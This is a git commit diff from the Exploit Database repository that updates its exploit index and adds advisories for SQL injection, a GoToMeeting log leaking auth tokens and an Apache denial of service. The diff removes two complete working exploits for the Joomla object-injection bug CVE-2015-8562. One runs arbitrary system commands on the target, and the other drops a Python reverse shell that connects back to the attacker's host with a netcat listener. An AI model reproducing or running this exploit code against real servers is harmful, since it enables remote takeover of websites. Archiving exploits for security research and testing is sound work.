DB: 2015-12-21
4 new exploits
This commit is contained in:
Offensive Security
parent
0f85105335
commit
ed1f034a74
7 changed files with 114 additions and 177 deletions
|
|
@ -35234,7 +35234,7 @@ id,file,description,date,author,platform,type,port
|
|||
38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0
|
||||
38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80
|
||||
38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80
|
||||
38977,platforms/php/remote/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,remote,0
|
||||
38977,platforms/php/webapps/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0
|
||||
38978,platforms/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460
|
||||
38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
|
||||
38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
|
||||
|
|
@ -35289,9 +35289,10 @@ id,file,description,date,author,platform,type,port
|
|||
39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
39033,platforms/php/remote/39033.py,"Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,remote,80
|
||||
39033,platforms/php/webapps/39033.py,"Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80
|
||||
39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80
|
||||
39035,platforms/win64/local/39035.txt,"Microsoft Windows win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win64,local,0
|
||||
39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0
|
||||
39038,platforms/php/webapps/39038.txt,"PFSense <= 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0
|
||||
39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0
|
||||
39040,platforms/windows/dos/39040.txt,"Adobe Flash MovieClip.attachBitmap - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
|
||||
|
|
@ -35313,3 +35314,6 @@ id,file,description,date,author,platform,type,port
|
|||
39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
|
||||
39058,platforms/php/webapps/39058.txt,"Imageview 'upload.php' Arbitrary File Upload Vulnerability",2014-01-21,"TUNISIAN CYBER",php,webapps,0
|
||||
39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin 'swfupload.php' Arbitrary File Upload Vulnerability",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39060,platforms/php/webapps/39060.txt,"XOS Shop 'goto' Parameter SQL Injection Vulnerability",2014-01-24,JoKeR_StEx,php,webapps,0
|
||||
39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0
|
||||
39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
45
platforms/android/local/39061.txt
Executable file
45
platforms/android/local/39061.txt
Executable file
|
|
@ -0,0 +1,45 @@
|
|||
source: http://www.securityfocus.com/bid/65123/info
|
||||
|
||||
GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities.
|
||||
|
||||
Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks.
|
||||
|
||||
GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected.
|
||||
|
||||
<! ----- SNIPPET ------- !>
|
||||
|
||||
D/G2M (32190): HttpRequest to:
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
|
||||
E/qcom_sensors_hal( 787): hal_process_report_ind: Bad item quality: 11
|
||||
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
|
||||
D/G2M (32190): HttpRequest response from: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
|
||||
-> 200
|
||||
D/G2M (32190): HttpRequest response body: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
|
||||
-> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"}
|
||||
D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
|
||||
D/G2M (32190): HttpRequest to:
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
|
||||
D/G2M (32190): HttpRequest response from: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200
|
||||
D/G2M (32190): HttpRequest response body: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] ->
|
||||
{"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch
|
||||
|
||||
annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false}
|
||||
D/G2M (32190): Got response from legacy JSON API: 200
|
||||
D/G2M (32190): JoinService: Attempting to join Meeting
|
||||
D/G2M (32190): MeetingService: Starting Meeting join on legacy...
|
||||
D/G2M (32190): HttpRequest to:
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
|
||||
D/G2M (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar
|
||||
[false]
|
||||
D/G2M (32190): HttpRequest response from: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
|
||||
-> 302
|
||||
D/G2M (32190): HttpRequest response body: GET
|
||||
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
|
||||
-> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|
||||
|
||||
<! ----- SNIPPET ------- !>
|
||||
|
|
@ -1,44 +0,0 @@
|
|||
'''
|
||||
Simple PoC for Joomla Object Injection.
|
||||
Gary @ Sec-1 ltd
|
||||
http://www.sec-1.com/
|
||||
'''
|
||||
|
||||
import requests # easy_install requests
|
||||
|
||||
def get_url(url, user_agent):
|
||||
|
||||
headers = {
|
||||
'User-Agent': user_agent
|
||||
}
|
||||
cookies = requests.get(url,headers=headers).cookies
|
||||
for _ in range(3):
|
||||
response = requests.get(url, headers=headers,cookies=cookies)
|
||||
return response
|
||||
|
||||
def php_str_noquotes(data):
|
||||
"Convert string to chr(xx).chr(xx) for use in php"
|
||||
encoded = ""
|
||||
for char in data:
|
||||
encoded += "chr({0}).".format(ord(char))
|
||||
|
||||
return encoded[:-1]
|
||||
|
||||
|
||||
def generate_payload(php_payload):
|
||||
|
||||
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
|
||||
|
||||
terminate = '\xf0\xfd\xfd\xfd';
|
||||
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
|
||||
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
|
||||
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
|
||||
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
|
||||
|
||||
return exploit_template
|
||||
|
||||
|
||||
|
||||
pl = generate_payload("system('touch /tmp/fx');")
|
||||
|
||||
print get_url("http://172.31.6.242/", pl)
|
||||
|
|
@ -1,131 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
|
||||
# Date: 12/17/2015
|
||||
# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
|
||||
# Vendor Homepage: https://www.joomla.org/
|
||||
# Software Link: http://joomlacode.org/gf/project/joomla/frs/
|
||||
# Version: Joomla 1.5 - 3.4.5
|
||||
# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
|
||||
# CVE : CVE-2015-8562
|
||||
|
||||
|
||||
'''
|
||||
Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
|
||||
PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
|
||||
|
||||
Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):
|
||||
https://www.exploit-db.com/exploits/38977/
|
||||
|
||||
Vulnerability Info, Exploit, Detection:
|
||||
https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
|
||||
|
||||
Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
|
||||
|
||||
Usage - Automate Blind RCE:
|
||||
python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
|
||||
$ touch /tmp/newhnewh
|
||||
|
||||
Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
|
||||
python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
|
||||
[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
|
||||
[-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
|
||||
<Response [200]>
|
||||
[+] Spawning reverse shell....
|
||||
<Response [200]>
|
||||
|
||||
Listening on [0.0.0.0] (family 0, port 4444)
|
||||
$ python -c "import pty;pty.spawn('/bin/bash')"
|
||||
www-data@ubuntu:/$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
www-data@ubuntu:/$
|
||||
|
||||
'''
|
||||
|
||||
import requests
|
||||
import subprocess
|
||||
import argparse
|
||||
import sys
|
||||
import base64
|
||||
|
||||
# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
|
||||
def get_url(url, user_agent):
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
|
||||
'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA
|
||||
}
|
||||
cookies = requests.get(url,headers=headers).cookies
|
||||
for _ in range(3):
|
||||
response = requests.get(url, headers=headers,cookies=cookies)
|
||||
return response
|
||||
|
||||
|
||||
def php_str_noquotes(data):
|
||||
"Convert string to chr(xx).chr(xx) for use in php"
|
||||
encoded = ""
|
||||
for char in data:
|
||||
encoded += "chr({0}).".format(ord(char))
|
||||
|
||||
return encoded[:-1]
|
||||
|
||||
|
||||
def generate_payload(php_payload):
|
||||
|
||||
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
|
||||
|
||||
terminate = '\xf0\xfd\xfd\xfd';
|
||||
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
|
||||
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
|
||||
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
|
||||
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
|
||||
|
||||
return exploit_template
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
|
||||
parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
|
||||
parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
|
||||
parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
|
||||
parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.cmd:
|
||||
print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
|
||||
print "[-] Dropping into shell-like environment to perform blind RCE"
|
||||
while True:
|
||||
command = raw_input('$ ')
|
||||
cmd_str = "system('{}');".format(command)
|
||||
pl = generate_payload(cmd_str)
|
||||
print get_url(args.RHOST, pl)
|
||||
|
||||
# Spawn Reverse Shell using Netcat listener + Python shell on victim
|
||||
elif args.LPORT and args.LPORT:
|
||||
connection = "'{}', {}".format(args.LHOST, args.LPORT)
|
||||
|
||||
# pentestmonkey's Python reverse shell one-liner:
|
||||
shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
|
||||
# Base64 encoded the Python reverse shell as some chars were messing up in the exploit
|
||||
encoded_comm = base64.b64encode(shell_str)
|
||||
# Stage 1 payload Str
|
||||
payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
|
||||
print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
|
||||
print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
|
||||
# Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
|
||||
pl = generate_payload("system('"+payload+"');")
|
||||
print get_url(args.RHOST, pl)
|
||||
# Spawns Shell listener using netcat on LHOST
|
||||
listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
|
||||
print "[+] Spawning reverse shell...."
|
||||
# Stage 2: Executes Python reverse shell back to LHOST:LPORT
|
||||
pl = generate_payload("system('python /tmp/newhnewh.py');")
|
||||
print get_url(args.RHOST, pl)
|
||||
else:
|
||||
print '[!] missing arguments'
|
||||
parser.print_help()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
9
platforms/php/webapps/39060.txt
Executable file
9
platforms/php/webapps/39060.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/65121/info
|
||||
|
||||
XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
|
||||
9
platforms/php/webapps/39062.txt
Executable file
9
platforms/php/webapps/39062.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/65126/info
|
||||
|
||||
ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks.
|
||||
|
||||
ZenPhoto 1.4.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection]
|
||||
45
platforms/windows/dos/39037.php
Executable file
45
platforms/windows/dos/39037.php
Executable file
|
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: Apache 2.4.17 - Denial of Service
|
||||
# Date: 17/12/2015
|
||||
# Exploit Author: rUnVirus [ Ahmed Atif]
|
||||
# Vendor Homepage: www.apache.org
|
||||
# Software Link: https://www.apachefriends.org/download.html/
|
||||
# Version: 5.5.30
|
||||
# Tested on: windows 7 - XAMPP Version 5.5.30 (Apache 2.4.17 - PHP 5.5.30)
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
$s="<?php
|
||||
|
||||
//!*runvirus:start*!";
|
||||
|
||||
$s2="!*runvirus:end*! ?>";
|
||||
|
||||
|
||||
|
||||
$shellcode=
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
|
||||
";
|
||||
|
||||
$egg = $s.$shellcode.$s2;
|
||||
|
||||
|
||||
|
||||
$content = preg_replace(
|
||||
'%//!\*runvirus:start\*!(.)+!\*runvirus:end\*!%s',
|
||||
'test',
|
||||
$egg
|
||||
);
|
||||
|
||||
echo 'If you can see this everything seems to be working fine.';
|
||||
|
||||
?>
|
||||
Loading…
Add table
Reference in a new issue